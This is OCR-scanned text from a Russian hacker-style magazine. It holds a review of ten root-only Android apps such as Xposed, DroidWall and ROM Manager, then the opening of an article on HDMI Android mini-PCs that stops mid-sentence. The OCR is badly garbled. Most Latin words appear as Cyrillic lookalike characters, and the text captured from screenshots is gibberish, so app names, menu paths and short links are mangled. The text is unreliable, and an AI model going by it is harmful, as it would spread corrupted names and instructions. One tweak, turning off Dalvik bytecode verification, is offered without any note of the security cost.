другу. Во многом эти ребята переняли практику анонимных 
алкоголиков и других подобных групп — у них существует своя 
система беджей, своего рода саппорт группы и прочее. Все се- 
рьезно, и этот сабреддит читают почти 60 тысяч человек. Одна- 
ко, упомянув порноголиков, нельзя умолчать о том, что на гебсііі: 
существуют тысячи сабреддитов вида *рогп, где вместо звез- 
дочки может быть что угодно — РообРогп, МШІагуРогп, ѲипРогп, 
НитапРогп. Что характерно, настоящего порно нет даже в по- 
следнем сабреддите. Слово «порно» здесь фигурирует в куда 
более широком смысле. Это скорее клубы по интересам, где 
фото красивого блюда или крутой пушки вызывает бурю эмо- 
ций и обильное слюноотделение, цс 
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Обзор тиві НаЬе инструментов для рутованного Апйгоій 
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Любой андроидовод знает, что такое гооі, а многие специально получают его 
для выполнения разного рода сервисных задач и запуска специализирован- 
ного софта. Тем не менее далеко не всем известно, какие на самом деле воз- 
можности.атфывает уаличие гооі-доступа на девайсе. В этой статье я расска- 
жу о десяти незаменимых гооі-приложениях, которые существенно расширят 
возможноЬти_тво,его аппарата. 





Евгений Зобнин 

ЕПЙгоЩзІ ГВ ѲІ . щ 
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РІМРМѴ ПОМ (ВЕТЛ) 

ОС: АпсігоісІ 2.1 и выше 
САЙТ: апсігоауісіеіг 

ЦЕНА: бесплатно 




Рітр Му Рот — это один из самых богатых 
на возможности гооі-инструментов, доступных 
в маркете. С его помощью к АпсігоісІ можно при- 
менить практически все существующие твики, 
установить модификации, включить эксперимен- 
тальные функции, разогнать процессор и многое, 
многое другое. Фактически я бы мог написать це- 
лую статью об этом инструменте, и мне бы даже 
не хватило места, чтобы сказать обо всем. Тем 
не менее писать целую статью все -таки излишне, 
так как значительная часть твиков не пригодится 
большинству пользователей, а некоторые просто 
не сработают. Вместо этого я расскажу, как с по- 
мощью Рітр Му Рот выполнить частые и наибо- 
лее необходимые настройки и твики. Итак, хит- 
парад из десяти моих любимых настроек: 

• Активация поддержки іпіісі. Каталог /еіс/іпіі. б 
в Упих-системах выполняет функцию систе- 
мы автозагрузки. Любой скрипт или команда, 
скопированная в него, будет выполнена во 
время загрузки девайса. Стоковые прошивки 
не имеют поддержки іпіі.сі, но ее легко в них 
добавить с помощью Рітр Му Рот: Тооіз — > 
ІІпіѵегзаІ Іпіі.сі ЗиррогТ — *■ Асііѵаіе. 

• Разгон, алгоритм энергосбережения и пла- 
нировщик ввода-вывода. Все это можно из- 
менить с помощью раздела Тооіз —* Рітр Му 
СРЫ. В качестве алгоритма энергосбережения 
(Соѵегпог) лучше выбрать іпіегасііѵе(х) или 
зтагіазз, а в качестве планировщика ввода- 
вывода (ІО Зсбебиіег) — зіо или беабііпе. 

• Запрет выгрузки приложений из памяти. Если 
ты часто используешь какое-либо приложение 
или несколько приложений, то есть смысл за- 
претить их выгрузку при нехватке свободной 
памяти: Тооіз — > І_оск Аррз іп Метогу. В этом 
случае выбранные софтины всегда будут за- 
пускаться моментально. С другой стороны, 
при запуске тяжелого софта (например, игр) 
их придется вручную выгружать из памяти 
с помощью таск-киллера. 

• Инженерное меню смартфона. В АпсігоісІ есть 
скрытое меню настроек, с помощью которо- 
го можно изменить некоторые параметры 
устройства (например, запретить переходить 
на 2Ѳ в условиях плохого сигнала 3(3), но, 
чтобы получить к нему доступ, необходимо 
набрать в номеронабирателе комбинацию 
*#*#4637#*#* или просто зайти в меню Тооіз — > 
Оеѵісе Нібсіеп Мели программы Рітр Му Вот. 

• Включение сжатия оперативной памяти. І_іпих- 
ядро некоторых прошивок включает в себя 
драйвер 2 ВАМ, который позволяет превра- 



тить часть оперативной памяти устройства 
в виртуальный своп со сжатием данных. Вклю- 
чение этого драйвера позволяет расширить 
объем оперативной памяти практически за- 
даром. Сделать это с помощью Рітр Му Вот 
можно так: Тѵѵеакз — *• Миііііазкіпд — * гВапл 
Сотргеззіоп —*■ 128тЬ. 

Отключение проверки на ошибки и провер- 
ки байт -кода при установке приложений. 
В АпсігоісІ есть два механизма проверки кода 
приложений на безопасность. Это проверка 
кода Оаіѵік во время установки приложения 
и проверка на ошибки исполнения запуска на- 
тивного кода. Отключив их, мы получим более 
быстрое исполнение и установку приложений: 
Тѵѵеакз — > Оаіѵік ѴМ — > Оаіѵік ЭМІ Еггог Сбескіпд 
/ Оаіѵік Вуіесобе Ѵегііісаііоп - ОН. 
Принудительная отрисовка с помощью гра- 
фического процессора. Начиная с версии 
4.0, Апбгоісі умеет отрисовывать интерфейс 
приложений с помощью СРІІ, благодаря чему 
достигается высокая плавность его работы. 
Однако, чтобы это происходило, приложение 
должно подтвердить необходимость такой от- 
рисовки, иначе все пойдет по старинке, через 
СРІІ, с тормозами. Чтобы заставить АпсігоісІ 
рисовать интерфейс всех приложений с по- 



мощью СРЫ, можно установить такой флажок: 
Тѵѵеакз — +■ Рогсе СРЭ Репсіегіпд — *■ Оп. Имей 
в виду, что это может привести к сбоям при- 
ложений. 

• Запрет на выгрузку рабочего стола из памяти. 
Наверняка ты сталкивался с таким поведени- 
ем смартфона, когда после нажатия на кнопку 
«Домой» сначала появлялся черный экран, 
а лишь затем рабочий стол, иконки и видже- 
ты. Это происходит потому, что рабочий стол 
был выгружен из памяти и теперь запускает- 
ся снова. Чтобы избежать этого, можно за- 
ставить систему всегда держать его в памяти: 
Тѵѵеакз — > 1_оск І_аипсбег іп Метогу — » Оп. Од- 
нако это будет стоить тебе 30-50 Мб памяти. 

• Оптимизация баз данных. АпсігоісІ использует 
базы данных ЗОІ_і1е везде, где только возмож- 
но. Со временем эти базы данных фрагмен- 
тируются, и выборка информации из них про- 
исходит медленнее. Чтобы избежать этого, 
можно заставить смартфон оптимизировать 
базы данных при каждой загрузке системы: 
Тѵѵеакз — *■ Оріітіге здІіІеЗ РаІаЬазез. 

• Сохранение заряда батареи. Есть множество 
способов сократить расход батареи. Все 
их можно применить с помощью одной на- 
стройки: Тѵѵеакз — > ВаПегу Заѵіпдз. 
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ХР08Е0 

ОС: Апсігоісі 4,0 и выше 
САЙТ: ПОО.ПІ/4ІВ2Ѵ 

ЦЕНА: бесплатно 

Как известно, кастомные консоли восстановле- 
ния, такие как СІоскѵѵогкМосІ и ТѴѴВР, позволя- 
ют устанавливать не только прошивки целиком, 
но и отдельные их части. Например, ядро, драй- 
веры или другие системные компоненты можно 
без каких-либо проблем установить отдельно 
и поверх уже существующей прошивки. 

Как результат такой возможности, в Сети по- 
явилось множество модов, которые позволяют 
изменять функционал стоковых и других про- 
шивок в разные стороны с помощью установки 
небольших обновлений поверх основной про- 
шивки (один из самых популярных — круговая 
батарея). Однако у таких модов есть несколько 
проблем, основные из которых — это частая 
ориентированность только на одно устройство 
или одну прошивку и необходимость перезагру- 
жаться в консоль и выполнять установку вруч- 
ную. 

Чтобы разобраться с этой проблемой, юзер 
гоѵо89 с ХЭА Оеѵеіорегз придумал оригиналь- 
ное решение. Он модифицировал системный 
фреймворк Апсігоісі таким образом, чтобы любую 
его функцию можно было перехватить и поме- 
нять на собственную реализацию. В результате 
появилось приложение ХрозесІ, которое позво- 
ляет заменить стандартный АпбгоісІ-фреймворк 
модифицированным и реализует интерфейс 
для подключения модулей, то есть модифика- 
ций, созданных другими разработчиками. 

Проект еще достаточно молодой, но за вре- 
мя его существования уже были реализованы 
следующие вкусности: 

• ХТНеплеЕпдіпе (доо.дІ/ЕЗХЫт) — движок 
тем, аналогичный тому, который использует- 
ся в СуаподепМосІ. К сожалению, несовме- 
стим с его темами. 

• Згпііеу Яеріасег (доо.д /ВпреЭ) — заменяет 
стандартный набор смайлов на более вме- 
няемый. 



8СПЕЕМ 8ТАМОВѴ 

ОС: Апсігоісі 2.0 и выше 
САЙТ : аоо.а1/ЦЦ8а 

ЦЕНА: бесплатно 

Одна из наиболее удручающих особенностей реа- 
лизации поддержки НЮМІ в Апсігоісі — это необхо- 
димость держать экран включенным. По умолча- 
нию картинка всегда выводится на основной экран 
смартфона или планшета, а при подключении 
внешнего экрана по НЮМІ она просто масштаби- 
руется и дополнительно выводится на «большой 
экран». Как результат, мы имеем две проблемы: 
отстойное качество картинки на телевизоре или 
мониторе из-за масштабирования и дублирова- 
ние картинки на двух экранах. С первым ничего 
нельзя сделать по технической причине, зато вто- 
рую можно решить с помощью приложения Зсгееп 
ЗіапсІЬу, которое принудительно отключает за- 
днюю подсветку экрана, так что можно спокойно 
смотреть видео или играть в игры, не отвлекаясь 
на копию изображения на планшете. 

Зсгееп ЗіапсІЬу позволяет нажатием кнопки 
отключить подсветку, также у него множество 
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Тм/еакЬох (доо.дІ/ЕОбІг) — на- 
бор из большого количества 
твиков. В комплекте: набор 
фонов и вариантов отображе- 
ния сигнала для статусбара, 
эффект старого телевизора 
при выключении экрана, воз- 
можность записи звонков, 
возможность изменения дей- 
ствия кнопки «Домой», пере- 
ключение композиций ка- 
челькой громкости и многое 
другое. Само собой, твики 
можно включать по отдельности. 

Арр ЗеНіпдз (сюо, дІ/ЮІ_иС ) — добавляет воз- 
можность изменения настроек для каждого 
приложения на манер РагапоісІ Апсігоісі. На- 
пример, для каждого приложения можно от- 
дельно изменить ОРІ , размер шрифта, язык, 
скрыть статусбар, переключить ориентацию 
экрана и даже отозвать привилегии. 

ТаЫе^ІМ Тгіддег ( аоо.аІ /ІХ94Ѵ ) — переключает 
интерфейс между телефонным, планшетным 
и телефонно-планшетным режимами. 

АН аррз іп РІау Зіоге (с оо.ді/сііі;' I ) — позво- 
ляет получить доступ ко всем приложениям 
в маркете, даже тем, которые разработчик 
пометил как несовместимые. 



В инсталляторе ХрозесІ 
достаточно просто 
нажать «Уста новить» . 
Список модулей после 
установки будет пуст 



Теперь о том, как все это использовать. 
Для начала установи инсталлятор ХрозесІ (:: о, 
сі NN ѵ/29 ) . После запуска следует нажать кноп- 
ку «Установить/Обновить» на главном экране. 
Смартфон перезагрузится, после чего будет го- 
тов принять модули. Сами модули распространя- 
ются в виде обычных АРК-пакетов, устанавливае- 
мых стандартным способом. После установки их 
необходимо активировать на вкладке «Модули» 
в инсталляторе ХрозесІ, а затем тапнуть по иконке 
модуля в меню приложений для его настройки. 
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Здесь вы можете установить 
Хрозесі систему. Это база для 
модулей, которые могут изменить 
поведение и внешний вид вашего 
телефона Апсігоісі. Для получения 
дополнительной информации 
смотрите здесь . 

Версии: текущая в пакете 

ХрозесІ Іпзіаііег 2.1.3 

арр_ргосезз 32 

ХрозесіВпгіде.іаіг 2.1.2 

Установить/Обновить 

Удаление (восстановление 
арр_ргосезз) 

Очистка (полное удаление) 
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ХрозесІ модули не найдень 




весьма полезных настроек, например отклю- 
чать экран разными способами (для І_ЕО - и ТРТ- 
экранов) и отключать подсветку самостоятель- 
но при подсоединении НОМІ -кабеля. Для этого 
достаточно включить опцию АЩо НОМІ/МНЬ 
Оеіесбоп в разделе НОМІ Оеіесііоп (там же есть 
и настройки отключения при запуске приложения 
или помещении в док)* 

В последних версиях Зсгееп ЗіапсІЬу также 
появились две очень полезные функции: тачпад 
и пульт удаленного управления. Первая превра- 
щает экран устройства в самый настоящий тач- 
пад, с помощью которого можно управлять кур- 
сором на экране, вторая — это пульт удаленного 
управления, включающий в себя функции нави- 
гации, клавиатуры и управления медиаплеером. 
Для его работы необходимо установить програм- 
му на оба устройства, а дальше воспользоваться 
автоматическим поиском с одной из сторон. 



За феерической 
мешаниной 
из дизайна 
Меіго иНоіо 
в Зсгееп ЗІалсІЬу 
скрывается куча 
полезностей 
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РІІШ8СПЕЕЫ 

ОС: АпеігоісІ 3,0 и выше 
САЙТ: нет 
ЦЕНА: бесплатно 




Начиная с версии 3.0, в АпеігоісІ появилась строка 
наэкранных клавиш управления, которая заме- 
нила собой аппаратные кнопки «Домой», «Назад» 
и «Меню», а также включила в себя функциональ- 
ность статусбара на планшетах. Это правиль- 
ный и логичный шаг со стороны Соодіе, однако 
благодаря толстой строке внизу экрана, которая 
скрывается только при использовании стокового 
плеера и УоиТиЬе, полезное пространство экрана 
исчезает в никуда (что особенно неприятно в слу- 
чае со смартфоном). 

Стандартной возможности скрыть строку 
в АпеігоісІ нет и никогда не появится, поэтому при- 
ходится выкручиваться собственными силами. 
Один из способов сделать это — установить при- 
ложение {иШзсгееп. Оно делает ровно то, о чем го- 
ворит его название, — скрывает строку и развора- 
чивает интерфейс приложения на полный экран. 

Чтобы оставить пользователю возможность 
возвращаться к предыдущему приложению или 
к домашнему экрану, ТиІИзсгееп создает в углу 
экрана (или даже в обоих углах) небольшую полу- 
прозрачную кнопку, при нажатии на которую появ- 
ляются стандартные клавиши навигации. То, какие 
клавиши будут доступны пользователю, какой бу- 
дет кнопка и что вообще она будет делать, можно 
настроить через окно настроек приложения. 

Стоит отметить, что в полноэкранном режиме 
нормально себя ведут только обычные приложе- 
ния. При запуске же ОрепСІ_-игр могут возникнуть 



Іиііізсгееп 

тШЗСПЕЕН 

йіІІ'эсгссптогіс 

Т ‘Чі( Іі Іи 

Ауіоеіэп 

ЕлаЫс іиік-ассп гпогіе вп Ьсо; 



поиГгсщіоп 

■. ыі Іі с ,і і. а- 1 : .. 1 1 иіс-іі Н 5 и.і 1. к у Гн іД- ьуь тЬ ,і 
ШІСН ЛИГА Г/ДОГКШЧАТИШ 

орле Ту 

□раеі іу аі іідкК ^ 1 би 



кЦе 

Зі гс СІ Ііе иліьН -Мгіір 

гіййітоиси Айгл 
РоеІМол 

Е 5 а-І г .аггі г- цСи 

СІіск осіюп 

С-рші ріе-топи 



?ГКВ|і 



Ппііпт г!Г|%і1 



^ Прт ррр-трліі 



І_опд сііек асііоп ав™ гейт ни» 



АіДІюіі 

КоіЛіпд 

ЗЕСоыотоисн алид 

РсТвІ I І.П.Л 






двоит С ОТТАЕТ 



ЕіиЬЫ 



юг 



ЙГИІг|І 



Л 



Л 




интересные глюки. По каким-то причинам система 
распознавания прикосновений начинает считать, 
что изображение на экране находится ниже, чем 
есть на самом деле, так, как будто если бы при ис- 
чезновении строки навигации изображение сдви- 
галось вниз. В результате прикосновения сраба- 
тывают не там, где нужно. 

В СуаподепМоб и многих других кастомных 
прошивках, кстати, такая функциональность 
встроена, и при ее активации описанных глюков 
не наблюдается. 



Вместо строки 
состояния теперь 
небольшая кнопка 
в углу экрана 




ШРО 

Возможность устанав- 
ливать сразу несколько 
файлов прошивки есть, 
кроме РЮМ Мападег, 
в приложении Аиіо 
РІазИег. 

Интересно, что, если по- 
искать в маркете другие 
приложения Рагадоп 
Зойѵѵаге, 90% из них 
окажутся различными 
словарями, стоимость 
которых ДОХОДИТ 
до 1000 рублей. 



І.МТІ.АІЛІСНЕП 

ОС: АпеігоісІ 3.0 и выше 
САЙТ: доо.ді/29014 

ЦЕНА: бесплатно 
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В стандартном браузере АпеігоісІ 4.0 появилась 
интересная экспериментальная функция, смысл 
которой заключается в том, чтобы убрать с экра- 
на любые элементы управления браузером 
и разместить их в небольшом круговом меню, ко- 
торое появляется после прикосновения к право- 
му краю экрана. Несмотря на инновационность 
и удобство использования, функция так и не ста- 
ла стандартным элементом браузера, однако 
идею быстро взяли на вооружение независимые 
разработчики. 

Через некоторое время подобная функ- 
циональность появилась в приложении 1_МТ 
1_аипсИег, предназначенном для создания альтер- 
нативной системы управления смартфоном в том 
случае, если у тебя отказали аппаратные клави- 
ши навигации или если ты хочешь использовать 
все рабочее пространство экрана на смартфоне 
типа Оаіаху Ыехиз. До этого в І_МТ І_аипсІіег были 
доступны довольно дурацкие способы замены, 
такие как многопальцевые жесты и создание не- 
видимых кнопок управления в углах экрана. 

С версии 0.8 здесь появилась и поддержка 
так называемого режима РІЕ, точно повторяюще- 
го функциональность стокового браузера. Теперь 
РІЕ используется в [_МТ І_аипсбег по умолчанию 
и доступен через прикосновение к правой сто- 
роне экрана. Само собой, его можно легко пере- 
весить на любую другую сторону экрана, а также 
изменить количество и назначение кнопок. 



В качестве дополнительной функциональ- 
ности доступны долгое нажатие на кнопку 
(например, долгое нажатие кнопки «Назад» 
приведет к закрытию и выгрузке текущего при- 
ложения из памяти) и показ дополнительной 
информации, такой как текущее время и дата 
(на случай, если статусбар также спрятан). 
Все это гибко настраивается и действительно 
удобно в использовании, особенно на смарт- 
фонах с большим экраном, где дотягиваться 



до стандартных клавиш навигации не очень 
удобно, и на больших планшетах, где проще 
дотронуться до края экрана пальцем, чем тя- 
нуться к его нижней части. 

К слову сказать, совсем скоро после 1_МТ 
І_аипсНег точно такая же функция появилась 
в прошивке РагапоісІ АпеігоісІ 3, откуда она в на- 
чале года была портирована в СуаподепМосІ, 
правда, в очень урезанном и не таком эффект- 
ном виде. 











Х-МоЬіІе 
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ОКОІОѴѴАЫ. 

ОС: АпсІгоіс1 1 .5 и выше 

САЙТ: с осіе.доодіе.сот/р/сігоісіѵѵаі 

ЦЕНА: бесплатно 




В ядро Ыпих встроен один из самых развитых, 
функциональных и производительных брандма- 
уэров среди всех операционных систем. Однако 
в Апбгоіб он никак не используется, что вполне 
логично, если учитывать мобильный характер 
операционной системы. 

Тем не менее было бы очень удобно с помо- 
щью возможностей встроенного файрвола регу- 
лировать то, какие приложения и в какие моменты 
могут получать доступ к Сети. Зачем, например, 
разрешать играм выходить в интернет и исполь- 
зовать эту возможность для показа рекламы? 
Или зачем разрешать фотокамере делать аплоад 
фотографий в СоодІе+ по ЗС, когда это можно сде- 
лать дома, подключившись к сети ѴѴі-Рі? 

Именно это позволяет сделать простое при- 
ложение под названием ОгоібѴѴаІІ. По сути, оно 
просто выводит на экран список приложений 
и позволяет расставить галочки напротив тех, ко- 
торые должны иметь доступ к интернету, и снять 
с тех, что не должны. Опционально можно раз- 
дельно регулировать доступ к мобильным сетям 
и ѴѴІ-РІ, благодаря чему можно серьезно сэконо- 
мить на мобильном трафике. 



© 
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Автор: Яо&ідо Іесіііп Яо$аисо 
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Перевод; Евгений Мартыненко 

ОгоіёѴѴаІІ - Апёгоіё Еігеѵѵа// является 
внешним приложением интерфейса для 
мощного брандмауэра Ііпих - ірІаЫеэ. 
Он позволяет ограничить круг 
приложений имеющих доступ к сетям 
передачи данных. 

Это идеальное решение, если у вас не 
безлимитный тарифный план, или Вы 
просто хотите сэкономить заряд вашей 
батареи. 

Использование ОгоісІЪѴаІІ: 

1 . Нажмите на Режим для переключения 
между режимами Белый список и 
Черный список. 

2. Пометьте приложения, которые Вы 
хотите заблокировать или разрешить (в 
зависимости от выбранного режима), 



Закрыть 



В ОгоісІѴѴаП 
неугодным 
приложениям 
можно легко 
запретить доступ 
кЗО 




ПОМ МАЫАСЕП 

ОС: АпсІгоісІ 2.2 и выше 
САЙТ: сіпскѵѵогктогі.сот 

ЦЕНА: бесплатно / 185 руб. 




ЩРО 

Брандмауэр есть и в не- 
которых антивирусных 
продуктах, например 
в Аѵазі МоЬіІе бесигііу. 



В ПОМ Мападег 
множество полезных 
настроек. Автор даже 
не навязывает рекламу 



Для выполнения таких операций, как установка 
прошивок или создание МапсігоісІ-бэкапа теку- 
щей прошивки, в АпсІгоісІ -девайсах используется 
консоль восстановления (гесоѵегу), в которую 
приходится самостоятельно перезагружаться, 
зажав специальные клавиши, а затем долго хо- 
дить по меню в поисках нужных функций и фай- 
лов прошивки. Чтобы облегчить этот процесс, 
Кушик Дутта, автор СІоскѵѵогкМоб Весоѵегу, на- 
писал приложение РОМ Мападег, которое по- 
зволяет проделать многие из этих операций, во- 
обще не касаясь консоли восстановления. 

Бесплатная версия приложения позволяет 
установить консоль восстановления, скачивать 
и устанавливать прошивку и создавать ІЧапсІгоісІ- 
бэкапы с помощью нескольких тапов. Заплатив 
185 рублей, ты получишь в придачу возможность 
выкачивать дельта-обновления прошивок, авто- 
матическое уведомление о выходе новой версии 
прошивки, автоматические бэкапы, а также воз- 
можность управлять через браузер и сохранять 
бэкапы на удаленном сервере. Особый плюс — 
так называемые цепочки установок, то есть воз- 
можность последовательной установки сразу не- 
скольких файлов прошивки, например, сначала 
саму прошивку, затем кастомное ядро и Сарра. 
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РАПАСОЫ ЫТР 5 & Н Р 8 + 

ОС: Апбгоісі 2.3.3 и выше 
САЙТ: ѵѵѵ\лл/.рагапоп-яоП\л/аге.сот 

ЦЕНА: бесплатно 




По умолчанию на внешних накопителях АпсІгоісІ 
поддерживает только файловые системы РАТ 
и ехРАТ. Это не очень хорошо, так как многие 
предпочитают форматировать карты памяти 
больших объемов, а также флешки и внешние 
жесткие диски в более подходящие для этого 
файловые системы. Линуксоиды — в ех!2, поль- 
зователи ѴѴіпсІоѵѵз и ОЗ X — в ІМТРЗ и НРЗ+. 

Однако если проблема первых решается до- 
вольно просто с помощью уже интегрированно- 
го в ядро драйвера, то вторым живется похуже. 
По умолчанию стоковые ядра вообще не вклю- 
чают в себя драйверы ЫТРЗ и НРЗ+, а кастомные 
если и включают, то не позволяют их использо- 
вать, что называется, из коробки. К счастью, ре- 
шить эту проблему довольно просто, если вос- 
пользоваться приложением Рагадоп ЫТРЗ & НРЗ+. 

Приложение включает в себя драйвер, а также 
прослойку для автомонтирования накопителей. 
По сути, все, что необходимо сделать, — это про- 
сто установить софтину, запустить и забыть о ней. 




Рагадоп можно 
использовать и 
для подключения 
ФС вручную. Точку 
подключения 
можно выбрать 
самостоятельно 




Наиболее дотошные могут также воспользовать- 
ся простеньким интерфейсом программы для ма- 



нуального подключения флешки или форматиро- 
вания в нужную ФС. 



АРР 8 ѴІІС 

ОС: АпсІгоісІ 2.2 и выше 
САЙТ: сюо.аІ/ѵѵ9025 

ЦЕНА: бесплатно 



В АпсІгоісІ нет встроенной функции синхрониза- 
ции настроек приложений между устройствами. 
Если у тебя телефон и парочка планшетов, на- 
страивать приложения, вбивать пароли и заново 
проходить игры придется три раза. Хитрые юзе- 
ры придумали способ синхронизации с помо- 
щью облачных бэкапов, но это костыль. 

Приложение АррЗупс позволяет полностью 
автоматизировать процесс обмена настройками 
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между несколькими приложениями одной ѴѴі-Рі- 
сети. Для этого достаточно установить АррЗупс 
на оба девайса, указать имя устройства и пароль 
для доступа к нему. Сразу после запуска АррЗупс 
на другом устройстве оно появится в списке. Да- 
лее можно выбрать необходимые приложения, 
и их данные будут загружены на устройство. Рго- 
версия приложения также поддерживает син- 
хронизацию через ІМРС и облачные диски. 
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К сожалению, 
можно 

синхрон изи ровать 
данные не всех 
приложений 



І.АСРІХ 

ОС: АпсІгоісІ 2.2 и выше 
САЙТ: нет 
ЦЕНА: бесплатно 




Наверняка ты замечал, что со временем, 
при заполнении внутренней памяти, смартфон 
начинает притормаживать, а количество сво- 
бодного пространства при этом оказывается 
меньше, чем об этом заявляет операционная 
система. 

Корень такого поведения — особенность ра- 
боты ЫАМО-ламяти, которая требует, чтобы пе- 
ред записью новых данных в ячейку памяти ста- 
рые данные были из нее явно стерты. Однако, 
поскольку при удалении файлов файловая си- 
стема не сообщает ІМЛЫй-контроллеру об этом 
событии и просто помечает файлы как удален- 
ные, начинаются проблемы несогласованно- 
сти. При следующей записи данных файловая 
система может выбрать как раз те блоки, ко- 
торые принадлежали уже удаленному файлу, 
и контроллеру приходится проверять, записаны 
ли в ячейки, привязанные к блоку, какие-то дан- 



ные, и, если это так, удалять их, а лишь затем 
писать данные нового файла. 

Все это приводит к тому, что при длительном 
использовании ІЧАІѴЮ-памяти почти все ячейки 
оказываются заняты либо существующими, 
либо уже удаленными файлами и при каждой 
записи новых данных происходит, во-первых, 
поиск действительно незанятых ячеек, а во- 
вторых, их очищение перед записью. В резуль- 
тате скорость записи данных существенно пада- 
ет (в среднем в два-три раза), а сам смартфон 
начинает тормозить. 

Чтобы избежать этого, можно запустить кон- 
сольную команду Гзігіт, которая принудительно 
очистит ячейки, принадлежащие уже удаленным 
файлам, и, таким образом, позволит в будущем 
записывать данные сразу. Можно также вос- 
пользоваться приложением 1_адРіх. Достаточно 
просто запустить его и нажать кнопку «Нил!». НЕ 







Запрос Суперпользователя: 5 

т ЬадРіх (ТзЫт) Ргее (1 52) 

ш I сот.дгіІІесІггіопкеу + ІадЛх 
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Без прав гооі тут никуда. „ 
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Примерно два года назад на прилавках китайских магазинов и в интернет-ката- 
логах начали появляться устройства совершенно нового типа: так называемые 
мини-ПК на базе процессоров АРМ и операционной системы Апсігоісі, оснащен- 
ные НЮМІ-выходом. Устройства оказались настолько удачными и популярными, 
что вскоре клоны начали выпускать чуть ли не в каждом втором китайском под- 
вале, а их продажей занялись даже самые именитые интернет-магазины. 




Евгений Зобнин 

апйгокЫгееІ.ги 
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Маленький силач 



МИНИ-ПК? 

Мини-ПК — это полуофициальное название подобных устройств. 
Точнее было бы назвать их ТВ- приставками, однако это почему- 
то не прижилось. Часто используется имя МК802 или МК808, 
в честь первых моделей таких устройств. В любом случае, каким 
бы ни было название, речь всегда идет об устройстве размером 
немногим более флешки, с одной стороны у которого торчит 
Н ОМ [-выход, а с другой — несколько ЫЗВ-портов. 

Вся соль в том, что, воткнув такую штуку в порт НЮМІ любо- 
го телека, можно тут же без лишних заморочек превратить его 
в Зтагі ТѴ, на котором можно смотреть ѴоиТиЬе-ролики через 
ѴѴі-Н-сеть, серфить инет и вообще запускать любой АпбгоісІ- 
софт, в том числе тяжелые игры. И все это за каких-то 2000 ру- 
блей, включая НОМІ-кабель и пульт дистанционного управления. 

БЭКГРАУНД 

Одной из первых таких приставок была модель Вікотадіс 
МК802, построенная на базе уже отжившего свое ЗоС АИѵѵіппег 
А10 (с процессором на 1 ГГц, 512 Мб оперативки, графическим 
процессором МаІі-400 МР) и оснащенная АпбгоісІ 4.0. Модель 
поступила в продажу в мае прошлого года и сейчас уже не про- 
изводится, уступив место моделям МК802 III и МК802 IV на базе 
гораздо более производительных двухъядерного Восксіпір 
НК3066 и четырехъядерного Посксііір РЖ3188 с 1 Гб и 2 Гб памя- 
ти соответственно. Кроме НЮМІ -выхода, все модели оснащены 
двумя портами тісгоІІЗВ 2.0, портом ІІЗВ 2.0 и слотом тісгоЗО, 
что в совокупности позволяет использовать их в качестве пол- 
ноценных компов с клавой, мышью, большой картой памяти 
либо внешним жестким диском. 

Со временем эта линейка устройств породила огромное 
количество клонов, выпускаемых на самых разнообразных 
китайских фабриках. Наиболее известными из них стали іМйо 
МХ1 и МХ2 с алюминиевым корпусом, очень хорошо отводящим 
тепло, а также линейка Міпіх Ыео, модели которой (С4, Х5, Х5, 
ХЗ) мало чем отличались от оригинала. Все они полностью со- 
вместимы с МК802 III и, по сути, являются его копией в другом 
корпусе. С выходом модели МК802 IV на свет сразу появились 
и соответствующие модели іМііо ОХ1 и Міпіх Х7 на базе четы- 
рехъядерного Восксііір ВК3188 с двумя гигабайтами памяти. 

Далее в статье я буду говорить об іМгёо МХ1, который хоть 
и несколько устарел, но зато успел обрасти большим количе- 
ством различных руководств, доработок и прошивок, среди ко- 
торых есть ІЛэипІи, да и цена у него на 30 долларов ниже. Если 
же ты только собрался заказывать устройство, то рекомендую 
остановиться на іМйо ОХ1 — кроме дополнительных двух ядер 
и гига памяти, от предыдущей модели он отличается не так уж 
сильно, и многое будет актуально и для него. Стоит только при- 
готовиться к тому, что никаких альтернативных прошивок, не го- 
воря уже об ІШипІи, для него пока нет. 

ПОКУПКА И ЗАПУСК 

Купить любое из перечисленных выше устройств можно 
на одном из трех сайтов: сІеаІехГгеате.сот . йпѵсіеаі.сот или 

оапсІаѵѵіИ.сот . Они почти не отличаются ни качеством обслужи- 




На задней стороне стика 
располагаются два порта 
тісгоІІЗВ 2.0, один полнораз- 
мерный порт ІІЗВ 2.0, слот 
для карты памяти и светодиод 




ѴѴАІШШС 

В прошивке Ріпіезз РЮМ 
имя устройства замене- 
но наСТ-19100 (баіаху 
8 II) для совместимости 
с большим количеством 
приложений в маркете. 
Поэтому не удивляйся, 
увидев Затзипд баіаху 
8 II вместо привычного 
МК802 III. 



Содержимое коробки 



вания, ни ценами, ни скоростью доставки, так что выбирай лю- 
бой, вбивай название устройства и нажимай «Виу поѵѵ». Пред- 
варительно, конечно, придется сделать кредитку. Примерно 
через месяц посылка придет в местное почтовое отделение. 

Подробно рассказывать о том, как выглядит это чудо, 
я не буду. Все понятно и без описаний, скажу лишь, что за- 
дний плісгоУЗВ-порт используется только для питания, поэтому 
подключать в него что-либо, кроме зарядника, не имеет смыс- 
ла. Для включения достаточно воткнуть стик одной стороной 
в НЮМІ-вход любого телека или монитора (ну или воспользо- 
ваться РЮМІ-удлинителем), а в другую вставить тіпіІІЗВ-шнур 
и запитать его любым удобным способом — хоть зарядником, 
хоть через комп. 

Штуковина включается автоматически сразу после подачи 
питания, и уже через 20 секунд на экране появляется рабочий 
стол АпбгоісІ. Для удобства управления некоторые производи- 
тели прикладывают к своим НЮМІ-стикам специальные пульты 
(которые можно купить по 10 долларов за штуку на тех же дилэк- 
стримах). Но гораздо удобнее использовать, хотя бы на первых 
порах, простую беспроводную мышь, она без проблем опреде- 
ляется и работает сразу после подключения. В будущем вместо 
нее можно использовать софтину РгоісІМоІе или официальную 
ЯКВетоІеСопІгоІ, которые позволяют рулить устройством 
со смартфона (и да, это все равно удобнее пульта). 

После обзаведения мышкой все остальное становится про- 
сто и очевидно: настройка языка, подключение к ѴѴі-Рі, под- 
ключение Соодіе-аккаунта, установка софта. Внутри это самый 
обычный Апбгоісі, так что никаких проблем с его использовани- 
ем возникнуть не должно. Если же ты хочешь выжать действи- 
тельно все из этого устройства и научиться использовать его 
эффективно, то без некоторых трюков и хаков не обойтись. 




УДАЛЕННЫЙ КОНТРОЛЬ 

Мышка — это хорошо и удобно, да и клавиатура — неплохо, 
но мы должны позаботиться о более универсальных мето- 
дах управления. Лучше всего на эту роль подойдет смартфон 
на том же андроиде, тем более что у любого устройства серии 
МК802, за исключением первых двух, есть собственная систе- 
ма удаленного управления с помощью смартфона под названи- 
ем ВКВетоІеСопІгоІ. 

Система эта хороша тем, что, обладая функциональностью 
пультов, требующих права гооі, она уже имеет встроенный сер- 
